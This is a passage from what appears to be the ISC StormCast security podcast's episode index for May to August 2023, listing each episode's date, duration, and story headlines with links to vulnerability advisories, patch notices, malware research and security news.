CVE-2023-32019 Fix Enabled by Default https://support.microsoft.com/en-us/topic/kb5028407-how-to-manage-the-vulnerability-associated-with-cve-2023-32019-bd6ed35f-48b1-41f6-bd19-d2d97270f080
CyberPower and Dataprobe Vulnerabilities https://www.trellix.com/en-us/about/newsroom/stories/research/the-threat-lurking-in-data-centers.html
Ford WiFi Driver Vulnerability https://www.ti.com/lit/er/swra773/swra773.pdf?ts=1691717352391&ref_url=https%253A%252F%252Fmedia.ford.com%252F
8/15/2023, 5 minutes, 51 seconds

ISC StormCast for Monday, August 14th, 2023

Show Me All Your Windows https://isc.sans.edu/diary/Show%20me%20All%20Your%20Windows!/30116
Zero Touch Pwn https://blog.syss.com/posts/zero-touch-pwn/
Maginot DNS Spoofing Attack https://www.usenix.org/conference/usenixsecurity23/presentation/li-xiang
8/14/2023, 5 minutes, 30 seconds

ISC StormCast for Friday, August 11th, 2023

Some things never change, such as SQL Authentication "Encryption" https://isc.sans.edu/diary/Some%20things%20never%20change%20%3F%20such%20as%20SQL%20Authentication%20%3Fencryption%3F/30112
Defender Pretender: When Windows Defender Updates Become a Security Risk https://www.blackhat.com/us-23/briefings/schedule/#defender-pretender-when-windows-defender-updates-become-a-security-risk-32706
Dell Compellent Hardcoded Key https://www.dell.com/support/kbdoc/en-us/000216615/dsa-2023-282-security-update-for-dell-storage-integration-tools-for-vmware-dsitv-vulnerabilities
Vulnerabilities in Sogou Keyboard https://citizenlab.ca/2023/08/vulnerabilities-in-sogou-keyboard-encryption/
8/11/2023, 6 minutes, 1 second

ISC StormCast for Thursday, August 10th, 2023

Tunnelcrack VPN Vulnerability https://papers.mathyvanhoef.com/usenix2023-tunnelcrack.pdf
Mozilla VPN Vulnerability https://www.openwall.com/lists/oss-security/2023/08/03/1
Non-English Exchange Server Patch Issues https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2023-exchange-server-security-updates/bc-p/3894481/highlight/true
VSCode Token Security https://cycode.com/blog/exposing-vscode-secrets/
Weekly Updates for Google Chrome https://security.googleblog.com/2023/08/an-update-on-chrome-security-updates.html
8/10/2023, 6 minutes, 14 seconds

ISC StormCast for Wednesday, August 9th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/diary/Microsoft%20August%202023%20Patch%20Tuesday/30106
Adobe Updates https://helpx.adobe.com/security/security-bulletin.html
8/9/2023, 6 minutes, 2 seconds

ISC StormCast for Tuesday, August 8th, 2023

Update: Researchers Scanning the Internet https://isc.sans.edu/diary/Update%3A%20Researchers%20scanning%20the%20Internet/30102
Malicious OpenBullet Configuration Files https://www.kasada.io/threat-intel-openbullet-malware/
Abusing Cloudflare Tunnels https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/
8/8/2023, 6 minutes, 27 seconds

ISC StormCast for Monday, August 7th, 2023

Are Leaked Credential Dumps Used by Attackers? https://isc.sans.edu/diary/Are%20Leaked%20Credentials%20Dumps%20Used%20by%20Attackers%3F/30098
New PaperCut RCE Vulnerability https://www.horizon3.ai/cve-2023-39143-papercut-path-traversal-file-upload-rce-vulnerability/
Microsoft Mitigates Power Platform Custom Code Information Disclosure Vulnerability https://msrc.microsoft.com/blog/2023/08/microsoft-mitigates-power-platform-custom-code-information-disclosure-vulnerability/
Microsoft Publishes Token Theft Playbook https://learn.microsoft.com/en-us/security/operations/token-theft-playbook
8/7/2023, 5 minutes, 16 seconds

ISC StormCast for Friday, August 4th, 2023

From small LNK to large malicious BAT file with zero VT score https://isc.sans.edu/diary/From%20small%20LNK%20to%20large%20malicious%20BAT%20file%20with%20zero%20VT%20score/30094
Social Engineering via Microsoft Teams https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/
Automating the Search for LOLBAS https://pentera.io/resources/whitepapers/the-lolbas-odyssey-finding-new-lolbas-and-how-you-can-too/
Sneaky Versioning Used to Bypass Scanners https://thehackernews.com/2023/08/malicious-apps-use-sneaky-versioning.html
Aruba Patches https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-010.txt
Mitel Patches https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-23-0008
8/4/2023, 5 minutes, 35 seconds

ISC StormCast for Thursday, August 3rd, 2023

Zeek and Defender Endpoint https://isc.sans.edu/diary/Zeek%20and%20Defender%20Endpoint/30088
New Ivanti MobileIron Core Vulnerability https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US
Salesforce Phishing https://labs.guard.io/phishforce-vulnerability-uncovered-in-salesforces-email-services-exploited-for-phishing-32024ad4b5fa
Abusing the Amazon Web Services SSM Agent as a Remote Access Trojan https://www.mitiga.io/blog/abusing-the-amazon-web-services-ssm-agent-as-a-remote-access-trojan
8/3/2023, 6 minutes, 8 seconds

ISC StormCast for Wednesday, August 2nd, 2023

DNS Over HTTPS Summary https://isc.sans.edu/diary/Summary%20of%20DNS%20over%20HTTPS%20requests%20against%20our%20honeypots./30084
Malware Infects Air-Gapped Networks https://usa.kaspersky.com/about/press-releases/2023_kaspersky-uncovers-malware-for-targeted-data-exfiltration-from-air-gapped-environments
Google Deleting Inactive Accounts https://support.google.com/accounts/answer/12418290?visit_id=638264210155158507-1346504535&p=inactive_account_policy_blog&rd=1
Google AMP Service Used for Phishing https://cofense.com/blog/google-amp-the-newest-of-evasive-phishing-tactic/
8/2/2023, 5 minutes, 18 seconds

ISC StormCast for Tuesday, August 1st, 2023

Ivanti Endpoint Manager Second Zero-Day https://forums.ivanti.com/s/article/CVE-2023-35081-Arbitrary-File-Write?language=en_US
New Redis Malware Uses Unknown Initial Access Vector https://www.cadosecurity.com/redis-p2pinfect/ https://unit42.paloaltonetworks.com/peer-to-peer-worm-p2pinfect/
Google Android 0-Day Summary https://security.googleblog.com/2023/07/the-ups-and-downs-of-0-days-year-in.html
Wiping Sensitive Data from Printers https://psirt.canon/advisory-information/cp2023-003/
8/1/2023, 5 minutes, 51 seconds

ISC StormCast for Monday, July 31st, 2023

USPS Phishing Scam Targeting iOS Users https://isc.sans.edu/forums/diary/USPS+Phishing+Scam+Targeting+iOS+Users/30078/
Do Attackers Pay More Attention to IPv6? https://isc.sans.edu/diary/Do%20Attackers%20Pay%20More%20Attention%20to%20IPv6%3F/30076
Shellcode in Images https://isc.sans.edu/diary/ShellCode%20Hidden%20with%20Steganography/30074
Ivanti MobileIron Exploit Public https://github.com/vchan-in/CVE-2023-35078-Exploit-POC/blob/main/cve_2023_35078_poc.py
7/31/2023, 5 minutes, 19 seconds

ISC StormCast for Friday, July 28th, 2023

Ubuntu OverlayFS Vulnerability https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability
CISA Warns of Insecure Direct Object Reference Vulnerabilities https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-208a
Sophos UTM Patch https://docs.sophos.com/releasenotes/index.html?productGroupID=nsg&productID=utm&versionID=9.7
Aruba Patches https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-009.txt
7/28/2023, 5 minutes, 47 seconds

ISC StormCast for Thursday, July 27th, 2023

Suspicious IP Addresses Avoided By Malware Samples https://isc.sans.edu/diary/Suspicious%20IP%20Addresses%20Avoided%20by%20Malware%20Samples/30068
Messaging Layer Security (MLS) Protocol https://datatracker.ietf.org/doc/html/rfc9420
PySecDB: Security Commit Dataset in Python https://github.com/SunLab-GMU/PySecDB
macOS Infostealer https://www.sentinelone.com/blog/apple-crimeware-massive-rust-infostealer-campaign-aiming-for-macos-sonoma-ahead-of-public-release/
7/27/2023, 5 minutes, 58 seconds

ISC StormCast for Wednesday, July 26th, 2023

Ivanti Patches Endpoint Manager Mobile https://forums.ivanti.com/s/article/CVE-2023-35078-Remote-unauthenticated-API-access-vulnerability?language=en_US
Atlassian Patches https://confluence.atlassian.com/security/security-bulletin-july-18-2023-1251417643.html
AMD Zen-2 Vulnerability https://lock.cmpxchg8b.com/zenbleed.html
VMware CVE-2023-20891 https://socradar.io/vmwares-response-to-the-critical-cve-2023-20891-vulnerability-exposing-cf-api-admin-credentials/
7/26/2023, 5 minutes

ISC StormCast for Tuesday, July 25th, 2023

Apple Updates https://isc.sans.edu/forums/diary/Apple%20Updates%20Everything%20%28again%29/30062/ https://support.apple.com/en-us/HT201222
Parsing Data with jq https://isc.sans.edu/diary/JQ%3A%20Another%20Tool%20We%20Thought%20We%20Knew/30060
TETRA Radio Backdoor https://www.wired.com/story/tetra-radio-encryption-backdoor/
7/25/2023, 6 minutes, 6 seconds

ISC StormCast for Monday, July 24th, 2023

Shodan's API for the (Recon) Win! https://isc.sans.edu/diary/Shodan%27s%20API%20For%20The%20%28Recon%29%20Win!/30050
Stolen Microsoft Key May Have Opened Up a Lot More Than US Government E-Mail Inboxes https://www.wiz.io/blog/storm-0558-compromised-microsoft-key-enables-authentication-of-countless-micr https://www.theregister.com/2023/07/21/microsoft_key_skeleton/
Okta Logs Decoded https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/
Threat Actors Exploiting Citrix CVE-2023-3519 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-201a https://github.com/securekomodo/citrixInspector
7/24/2023, 6 minutes, 13 seconds

ISC StormCast for Friday, July 21st, 2023

Deobfuscation of Malware Delivered Through a .bat File https://isc.sans.edu/diary/Deobfuscation%20of%20Malware%20Delivered%20Through%20a%20.bat%20File/30048
Citrix CVE-2023-3519 Indicators of Compromise https://www.deyda.net/index.php/en/2023/07/19/checklist-for-citrix-adc-cve-2023-3519/
ssh-agent Vulnerability https://www.qualys.com/2023/07/19/cve-2023-38408/rce-openssh-forwarded-ssh-agent.txt
Spring Security: WebFlux Security Bypass with Un-Prefixed Double Wildcard Pattern https://spring.io/security/cve-2023-34034
American Megatrends (AMI) MegaRAC BMC Vulnerabilities https://eclypsium.com/research/bmcc-lights-out-forever/
7/21/2023, 3 minutes, 31 seconds

ISC StormCast for Thursday, July 20th, 2023

Citrix ADC Vulnerability CVE-2023-3519, CVE-2023-3466, CVE-2023-3467 https://isc.sans.edu/forums/diary/Citrix%20ADC%20Vulnerability%20CVE-2023-3519%2C%203466%20and%203467%20-%20Patch%20Now!/30044/
HAM Radio Enigma Machine Challenge https://isc.sans.edu/diary/HAM%20Radio%20%2B%20Enigma%20Machine%20Challenge/30042
Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpujul2023.html
Microsoft Expanding Cloud Logging https://www.microsoft.com/en-us/security/blog/2023/07/19/expanding-cloud-logging-to-give-customers-deeper-security-visibility/
7/20/2023, 3 minutes, 10 seconds

ISC StormCast for Wednesday, July 19th, 2023

Exploit Attempts for "Stagil navigation for Jira Menus & Themes" https://isc.sans.edu/diary/Exploit%20Attempts%20for%20%22Stagil%20navigation%20for%20Jira%20Menus%20%26%20Themes%22%20CVE-2023-26255%20and%20CVE-2023-26256/30038
Citrix Vulnerabilities https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467
Google Cloud Build Service Vulnerability https://orca.security/resources/blog/bad-build-google-cloud-build-potential-supply-chain-attack-vulnerability
7/19/2023, 5 minutes, 45 seconds

ISC StormCast for Tuesday, July 18th, 2023

Zimbra Vulnerability Exploited https://blog.zimbra.com/2023/07/security-update-for-zimbra-collaboration-suite-version-8-8-15
WooCommerce Vulnerability Actively Being Exploited https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/
Adobe ColdFusion Flaws Exploited https://www.bleepingcomputer.com/news/security/adobe-warns-of-critical-coldfusion-rce-bug-exploited-in-attacks/
CISA Cloud Security Fact Sheet: Free Tools for Cloud Environments https://www.cisa.gov/sites/default/files/2023-07/Free%20Tools%20for%20Cloud%20Environments_508c.pdf
JumpCloud Breach https://arstechnica.com/security/2023/07/jumpcloud-says-nation-state-hacker-breach-targeted-some-of-its-customers/
7/18/2023, 5 minutes, 12 seconds

ISC StormCast for Monday, July 17th, 2023

Microsoft Driver Certs Details https://blog.talosintelligence.com/old-certificate-new-signature/
Threads App Lures https://www.helpnetsecurity.com/2023/07/14/threads-app-lure/
FIRST Releases CVSS 4.0 Preview https://www.first.org/cvss/
7/17/2023, 7 minutes, 9 seconds

ISC StormCast for Friday, July 14th, 2023

DShield Honeypot Maintenance and Data Retention https://isc.sans.edu/diary/DShield%20Honeypot%20Maintenance%20and%20Data%20Retention/30024
Enhanced Monitoring to Detect APT Activity Targeting Outlook Online https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-193a
PoC Exploit: Fake Proof of Concept with Backdoor Malware https://www.uptycs.com/blog/new-poc-exploit-backdoor-malware
GhostScript CVE-2023-36664 PoC Exploit https://www.kroll.com/en/insights/publications/cyber/ghostscript-cve-2023-36664-remote-code-execution-vulnerability
7/14/2023, 5 minutes, 37 seconds

ISC StormCast for Thursday, July 13th, 2023

Apple Re-Releases Rapid Security Update for iOS/macOS https://support.apple.com/HT201224
Loader Activity For Formbook "QM18" https://isc.sans.edu/diary/Loader%20activity%20for%20Formbook%20%22QM18%22/30020
Adobe Patches https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html
FortiOS/FortiProxy Stack Based Overflow https://www.fortiguard.com/psirt/FG-IR-23-183
Citrix Secure Access Client for Ubuntu https://support.citrix.com/article/CTX564169/citrix-secure-access-client-for-ubuntu-security-bulletin-for-cve202324492
SonicWall Updates https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0010
7/13/2023, 6 minutes, 9 seconds

ISC StormCast for Wednesday, July 12th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/July%202023%20Microsoft%20Patch%20Update/30018/ https://blog.talosintelligence.com/old-certificate-new-signature/
Apple Withdraws Rapid Security Response Update https://support.apple.com/en-us/HT213827
7/12/2023, 6 minutes, 33 seconds

ISC StormCast for Tuesday, July 11th, 2023

Apple Rapid Security Update Patches Three Exploited Vulnerabilities https://isc.sans.edu/diary/Apple%20Rapid%20Security%20Update%20Patches%20Three%20Exploited%20Vulnerabilities/30012
Ubiquiti EdgeRouter and AirCube miniupnpd Heap Overflow https://ssd-disclosure.com/ssd-advisory-edgerouters-and-aircube-miniupnpd-heap-overflow/
Mozilla Restricting Extensions on Quarantined Domains https://support.mozilla.org/en-US/kb/quarantined-domains https://www.mozilla.org/en-US/firefox/115.0/releasenotes/ https://lapcatsoftware.com/articles/2023/7/1.html
7/11/2023, 5 minutes, 43 seconds

ISC StormCast for Monday, July 10th, 2023

DSSuite (Didier's Toolbox) Docker Image Update https://isc.sans.edu/diary/DSSuite%20%28Didier%27s%20Toolbox%29%20Docker%20Image%20Update/30008
More MOVEit Flaws and New Service Pack https://community.progress.com/s/article/MOVEit-Transfer-2020-1-Service-Pack-July-2023
Cisco Nexus 9000 Flaw https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-aci-cloudsec-enc-Vs5Wn2sX
7/10/2023, 4 minutes, 16 seconds

ISC StormCast for Friday, July 7th, 2023

IDS Comparisons with DShield Honeypot Data https://isc.sans.edu/diary/IDS%20Comparisons%20with%20DShield%20Honeypot%20Data/30002
Truebot Exploits Netwrix Auditor https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-187a
StackRot Linux Privilege Escalation Vulnerability https://www.openwall.com/lists/oss-security/2023/07/05/1
TeamsPhisher Exploit https://github.com/Octoberfest7/TeamsPhisher
VMware Update https://www.vmware.com/security/advisories/VMSA-2023-0015.html
7/7/2023, 5 minutes, 52 seconds

ISC StormCast for Thursday, July 6th, 2023

DShield pfSense Client Update https://isc.sans.edu/diary/DShield%20pfSense%20Client%20Update/29994
Exposed Industrial Control Systems https://isc.sans.edu/diary/Controlling%20network%20access%20to%20ICS%20systems/30000
Analysis Method for Custom Encoding https://isc.sans.edu/diary/Analysis%20Method%20for%20Custom%20Encoding/29946
SNAPPY: Detecting Rogue WiFi Access Points https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/snappy-detecting-rogue-and-fake-80211-wireless-access-points-through-fingerprinting-beacon-management-frames/
RUSTBUCKET Mac Malware https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket
7/6/2023, 6 minutes, 57 seconds

ISC StormCast for Friday, June 30th, 2023

GuLoader or DBatLoader/ModiLoader-style Infection for Remcos RAT https://isc.sans.edu/diary/GuLoader-%20or%20DBatLoader%20ModiLoader-style%20infection%20for%20Remcos%20RAT/29990
CVE-2023-26258 Remote Code Execution in Arcserve UDP Backup https://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/
Sysmon Update https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon https://medium.com/@olafhartong/sysmon-15-0-file-executable-detected-40fd64349f36
Drone Security and Fault Injection Attacks https://labs.ioactive.com/2023/06/applying-fault-injection-to-firmware.html
6/30/2023, 6 minutes, 42 seconds

ISC StormCast for Thursday, June 29th, 2023

Kazakhstan: The World's Last SSLv2 Superpower https://isc.sans.edu/diary/Kazakhstan%20-%20the%20world%27s%20last%20SSLv2%20superpower...%20and%20a%20country%20with%20potentially%20vulnerable%20last-mile%20internet%20infrastructure/29988
npm Manifest Issues https://blog.vlt.sh/blog/the-massive-hole-in-the-npm-ecosystem
Process Mockingjay: Echoing RWX In Userland To Achieve Code Execution https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution
6/29/2023, 5 minutes, 39 seconds

ISC StormCast for Wednesday, June 28th, 2023

The Importance of Malware Triage https://isc.sans.edu/diary/The+Importance+of+Malware+Triage/29984/
RowPress: Amplifying Read Disturbance in Modern DRAM Chips https://dl.acm.org/doi/abs/10.1145/3579371.3589063
Dell BIOS Updates https://www.dell.com/support/kbdoc/de-de/000214778/dsa-2023-174-dell-client-bios-security-update-for-an-out-of-bounds-write-vulnerability
Google Chrome Update https://chromereleases.googleblog.com/2023/06/stable-channel-update-for-desktop_26.html
6/28/2023, 5 minutes, 10 seconds

ISC StormCast for Tuesday, June 27th, 2023

BlackLotus Mitigation Guide https://media.defense.gov/2023/Jun/22/2003245723/-1/-1/0/CSI_BlackLotus_Mitigation_Guide.PDF
Camaro Dragon Infects USB Drives as well as Network Drives https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
Grafana Security Release https://grafana.com/blog/2023/06/22/grafana-security-release-for-cve-2023-3128/
6/27/2023, 5 minutes, 15 seconds

ISC StormCast for Monday, June 26th, 2023

Email Spam With ModiLoader Attached https://isc.sans.edu/diary/Email%20Spam%20with%20Attachment%20Modiloader/29978
Word Document with an Online Attached Template https://isc.sans.edu/diary/Word%20Document%20with%20an%20Online%20Attached%20Template/29976
Qakbot (Qbot) Activity, obama271 Distribution Tag https://isc.sans.edu/diary/Qakbot%20%28Qbot%29%20activity%2C%20obama271%20distribution%20tag/29968
Microsoft Teams External Tenant Confusion https://labs.jumpsec.com/advisory-idor-in-microsoft-teams-allows-for-external-tenants-to-introduce-malware/
Free Smart Watches https://www.darkreading.com/threat-intelligence/suspicious-smartwatches-mailed-us-army-personnel
6/26/2023, 6 minutes, 56 seconds

ISC StormCast for Friday, June 23rd, 2023

Apple Updates Already Exploited Vulnerabilities https://isc.sans.edu/diary/Apple%20Patches%20Exploited%20Vulnerabilities%20in%20iOS%20iPadOS%2C%20macOS%2C%20watchOS%20and%20Safari/29972
Heap Buffer Overflow in VMware vCenter https://www.vmware.com/security/advisories/VMSA-2023-0014.html
GitHub RepoJacking https://blog.aquasec.com/github-dataset-research-reveals-millions-potentially-vulnerable-to-repojacking
6/23/2023, 5 minutes, 26 seconds

ISC StormCast for Thursday, June 22nd, 2023

Analyzing a YouTube Sponsorship Phishing E-Mail https://isc.sans.edu/diary/Analyzing%20a%20YouTube%20Sponsorship%20Phishing%20Mail%20and%20Malware%20Targeting%20Content%20Creators/29966
Malicious Code Can Be Anywhere https://isc.sans.edu/diary/Malicious%20Code%20Can%20Be%20Anywhere/29964
Zyxel Vulnerability https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-pre-authentication-command-injection-vulnerability-in-nas-products
Huawei Vulnerability https://www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-thvihr-7015cbae-en
Asus Vulnerability https://www.asus.com/content/asus-product-security-advisory/
VMware Aria Vulnerability Exploited https://www.vmware.com/security/advisories/VMSA-2023-0012.html
6/22/2023, 5 minutes, 41 seconds

ISC StormCast for Tuesday, June 20th, 2023

Formbook From Possible ModiLoader (DBatLoader) https://isc.sans.edu/diary/Formbook%20from%20Possible%20ModiLoader%20%28DBatLoader%29%20/29958
Brute-Force ZIP Password Cracking with zipdump.py https://isc.sans.edu/diary/Brute-Force%20ZIP%20Password%20Cracking%20with%20zipdump.py/29948
Malware Delivered Through .inf File https://isc.sans.edu/diary/Malware%20Delivered%20Through%20.inf%20File/29960
FortiNAC - Just a Few More RCEs https://frycos.github.io/vulns4free/2023/06/18/fortinac.html
6/20/2023, 5 minutes, 52 seconds

ISC StormCast for Friday, June 16th, 2023

Supervision and Verification in Vulnerability Management https://isc.sans.edu/diary/Supervision%20and%20Verification%20in%20Vulnerability%20Management/29952
More MOVEit Issues https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-15June2023
Critical Citrix ShareFile StorageZones Controller Vulnerability https://support.citrix.com/article/CTX559517/sharefile-storagezones-controller-security-update-for-cve202324489
ChromeLoader Malware Update https://threatresearch.ext.hp.com/shampoo-a-new-chromeloader-campaign/
bignum npm Package Compromise https://checkmarx.com/blog/hijacking-s3-buckets-new-attack-technique-exploited-in-the-wild-by-supply-chain-attackers
6/16/2023, 5 minutes, 33 seconds

ISC StormCast for Thursday, June 15th, 2023

Deobfuscating a VBS Script With Custom Encoding https://isc.sans.edu/diary/Deobfuscating%20a%20VBS%20Script%20With%20Custom%20Encoding/29940
Every Signature is Broken: On the Insecurity of Microsoft Office's OOXML Signatures https://www.usenix.org/conference/usenixsecurity23/presentation/rohlmann
How to Manage the Vulnerability Associated with CVE-2023-32019 https://support.microsoft.com/en-gb/topic/kb5028407-how-to-manage-the-vulnerability-associated-with-cve-2023-32019-bd6ed35f-48b1-41f6-bd19-d2d97270f080
Fake Security Research GitHub Repos https://vulncheck.com/blog/fake-repos-deliver-malicious-implant
Fortigate Vulnerability Details https://blog.lexfo.fr/xortigate-cve-2023-27997.html
Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/
6/15/2023, 5 minutes, 56 seconds

ISC StormCast for Wednesday, June 14th, 2023

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/June%202023%20Microsoft%20Patch%20Tuesday/29942/
VMware 0-Day https://www.mandiant.com/resources/blog/vmware-esxi-zero-day-bypass https://www.vmware.com/security/advisories/VMSA-2023-0013.html
SAP Patches https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html
6/14/2023, 5 minutes, 29 seconds

ISC StormCast for Tuesday, June 13th, 2023

Geoserver Attack Details: More Cryptominers Against Unconfigured WebApps https://isc.sans.edu/diary/Geoserver%20Attack%20Details%3A%20More%20Cryptominers%20against%20Unconfigured%20WebApps/29936
Fortinet Update CVE-2023-27997 https://www.fortiguard.com/psirt/FG-IR-23-097
Bitwarden Key Accessible By Low Privileged User https://hackerone.com/reports/1874155
Western Digital SMART Flag Abuse https://arstechnica.com/gadgets/2023/06/clearly-predatory-western-digital-sparks-panic-anger-for-age-shaming-hdds/
6/13/2023, 5 minutes, 33 seconds

ISC StormCast for Monday, June 12th, 2023

Undetected PowerShell Backdoor Disguised as a Profile File https://isc.sans.edu/diary/Undetected%20PowerShell%20Backdoor%20Disguised%20as%20a%20Profile%20File/29930
DShield Honeypot Activity for May 2023 https://isc.sans.edu/diary/DShield%20Honeypot%20Activity%20for%20May%202023%20/29932
Second MOVEit Vulnerability https://www.progress.com/security/moveit-transfer-and-moveit-cloud-vulnerability
Fortinet Patches CVE-2023-27997 https://twitter.com/cfreal_/status/1667852157536616451
6/12/2023, 5 minutes, 37 seconds

ISC StormCast for Friday, June 9th, 2023

Geoserver Scans https://isc.sans.edu/diary/Ongoing%20scans%20for%20Geoserver/29926
Barracuda Recommends Replacing Compromised Devices https://www.barracuda.com/company/legal/esg-vulnerability
Google Improves Chrome Password Manager https://www.msn.com/en-us/news/other/chrome-adds-windows-biometric-logins-to-its-password-powers/ar-AA1ciCCf
Minecraft Mods Include Malicious Code https://www.bleepingcomputer.com/news/security/new-fractureiser-malware-used-curseforge-minecraft-mods-to-infect-windows-linux/
Trend Micro Service Pack https://files.trendmicro.com/documentation/readme/Apex%20One/2020/apex_one_2019_win_cp_b12033_EN_Critical_Patch_Readme.html
6/9/2023, 5 minutes, 26 seconds

ISC StormCast for Thursday, June 8th, 2023

DMARC in .co TLD https://isc.sans.edu/diary/Management%20of%20DMARC%20control%20for%20email%20impersonation%20of%20domains%20in%20the%20.co%20TLD%20-%20part%202/29922
Three Vulnerabilities in VMware Aria Operations for Networks https://www.vmware.com/security/advisories/VMSA-2023-0012.html
SpinOk Spyware SDK Found in Android Apps https://vms.drweb.com/search/?q=Android.Spy.SpinOk&lng=en https://www.cloudsek.com/threatintelligence/supply-chain-attack-infiltrates-android-apps-with-malicious-sdk
Cisco AnyConnect Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-csc-privesc-wx4U4Kw
RSA Webcast https://www.rsaconference.com/library/webcast/149-sans-followup-2023
6/8/2023, 5 minutes, 45 seconds

ISC StormCast for Wednesday, June 7th, 2023

GitHub Copilot vs. Google: Which Code is More Secure https://isc.sans.edu/forums/diary/Github%20Copilot%20vs.%20Google%3A%20Which%20code%20is%20more%20secure/29918/
Android Update https://source.android.com/docs/security/bulletin/2023-06-01
Chrome Updates https://chromereleases.googleblog.com/2023/06/stable-channel-update-for-desktop.html
FBI Warns of Manipulated Photos and Videos For Sextortion https://www.ic3.gov/Media/Y2023/PSA230605
6/7/2023, 6 minutes, 4 seconds

ISC StormCast for Tuesday, June 6th, 2023

Brute Forcing Simple Archive Passwords https://isc.sans.edu/diary/Brute%20Forcing%20Simple%20Archive%20Passwords/29914
KeePass 2.54 Released https://keepass.info/news/n230603_2.54.html
Splunk Advisories https://advisory.splunk.com/advisories
Malicious Google Chrome Extensions https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/
Symantec Updates https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/22217
6/6/2023, 5 minutes, 28 seconds

ISC StormCast for Monday, June 5th, 2023

Critical Vulnerability in MOVEit Transfer Actively Exploited https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023 https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/ https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft
Atomic Wallet Compromise https://www.bleepingcomputer.com/news/security/atomic-wallet-hacks-lead-to-over-35-million-in-crypto-stolen/
Magecart Update https://www.akamai.com/blog/security-research/new-magecart-hides-behind-legit-domains
6/5/2023, 5 minutes, 56 seconds

ISC StormCast for Friday, June 2nd, 2023

After 28 Years, SSLv2 is Still Not Gone https://isc.sans.edu/forums/diary/After%2028%20years%2C%20SSLv2%20is%20still%20not%20gone%20from%20the%20internet...%20but%20we're%20getting%20there/29908/
Operation Triangulation: iOS Devices Targeted With Previously Unknown Malware https://securelist.com/operation-triangulation/109842/
MOVEit Transfer Critical Vulnerability https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023
Code Injection Vulnerability in ReportLab Python Library https://github.com/c53elyas/CVE-2023-33733
6/2/2023, 17 minutes, 9 seconds

ISC StormCast for Thursday, June 1st, 2023

Apache NiFi Attacks https://isc.sans.edu/diary/Your%20Business%20Data%20and%20Machine%20Learning%20at%20Risk%3A%20Attacks%20Against%20Apache%20NiFi/29900
Gigabyte App Center Backdoor https://eclypsium.com/blog/supply-chain-risk-from-gigabyte-app-center-backdoor/
Salesforce Ghost Sites https://www.varonis.com/blog/salesforce-ghost-sites
CVE-2023-34152: Shell Command Injection in ImageMagick https://securityonline.info/cve-2023-34152-shell-command-injection-bug-affecting-imagemagick/
6/1/2023, 6 minutes, 51 seconds

ISC StormCast for Wednesday, May 31st, 2023

Malspam Pushes ModiLoader Infection for Remcos RAT https://isc.sans.edu/diary/Malspam%20pushes%20ModiLoader%20%28DBatLoader%29%20infection%20for%20Remcos%20RAT/29896
macOS SIP Bypass https://www.microsoft.com/en-us/security/blog/2023/05/30/new-macos-vulnerability-migraine-could-bypass-system-integrity-protection/
OpenSSL Update https://www.openssl.org/news/secadv/20230530.txt
Barracuda Email Security Gateway Appliance Vulnerability Details https://www.barracuda.com/company/legal/esg-vulnerability#:~:text=the%20section%20below.-,Endpoint%20IOCs,-Table%204%20lists
Void Rabisu RomCom Backdoor https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html
Nextcloud Vulnerability https://github.com/nextcloud/security-advisories/security/advisories/GHSA-mr7q-xf62-fw54
Zyxel NAS Vulnerability https://sternumiot.com/iot-blog/ntp-textbox-vulnerability-in-zyxel-nas326-nas540-and-nas542-devices/
Wait Just An Infosec: Higher Ed https://www.youtube.com/watch?v=ufEuo-096yc&list=PLtgaAEEmVe6B2kqkE9KdgPJdtbqNiaiOn&index=8
5/31/2023, 5 minutes, 54 seconds

ISC StormCast for Tuesday, May 30th, 2023

Analyzing Office Documents Embedded Inside PowerPoint Files https://isc.sans.edu/diary/Analyzing%20Office%20Documents%20Embedded%20Inside%20PPT%20%28PowerPoint%29%20Files/29894
